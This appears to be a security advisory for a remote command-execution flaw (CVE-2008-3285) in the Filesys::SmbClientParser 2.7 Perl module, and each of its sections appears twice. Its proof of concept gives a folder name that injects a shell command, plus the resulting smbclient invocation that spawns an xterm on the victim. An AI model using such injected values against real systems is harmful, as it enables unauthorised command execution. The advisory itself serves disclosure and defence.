SmbClientParser Perl Module Remote Command Execution Vulnerability
BID:30290
Info
SmbClientParser Perl Module Remote Command Execution Vulnerability
| Bugtraq ID: | 30290 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3285 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 18 2008 12:00AM |
| Updated: | Apr 16 2015 05:58PM |
| Credit: | Jesus Olmos Gonzalez |
| Vulnerable: |
Alain Barbet Filesys::SmbClientParser 2.7 |
| Not Vulnerable: | |
Discussion
SmbClientParser Perl Module Remote Command Execution Vulnerability
The SmbClientParser Perl module is prone to a remote command-execution vulnerability because it fails to sufficiently sanitize user-supplied data.
Successfully exploiting this issue will allow an attacker to execute arbitrary commands with the privileges of the user running applications that use the module.
Filesys::SmbClientParser 2.7 is vulnerable; other versions may also be affected.
The SmbClientParser Perl module is prone to a remote command-execution vulnerability because it fails to sufficiently sanitize user-supplied data.
Successfully exploiting this issue will allow an attacker to execute arbitrary commands with the privileges of the user running applications that use the module.
Filesys::SmbClientParser 2.7 is vulnerable; other versions may also be affected.
Exploit / POC
SmbClientParser Perl Module Remote Command Execution Vulnerability
The following exploit will spawn an xterm on the victim's computer:
Name a folder the following:
' x && xterm &#
A shared folder containing this named folder will execute the following command:
/usr/bin/smbclient "//x.x.x.x/vulns" -U "user%pass" -d0 -c 'cd "'x && xterm &#"' -D "/poc"
The following exploit will spawn an xterm on the victim's computer:
Name a folder the following:
' x && xterm &#
A shared folder containing this named folder will execute the following command:
/usr/bin/smbclient "//x.x.x.x/vulns" -U "user%pass" -d0 -c 'cd "'x && xterm &#"' -D "/poc"
Solution / Fix
SmbClientParser Perl Module Remote Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
SmbClientParser Perl Module Remote Command Execution Vulnerability
References:
References:
- Filesys::SmbClientParser CPAN Page (Alain Barbet)
- [ISecAuditors Security Advisories] SmbClientParser Perl module allows remote co (ISecAuditors Security Advisories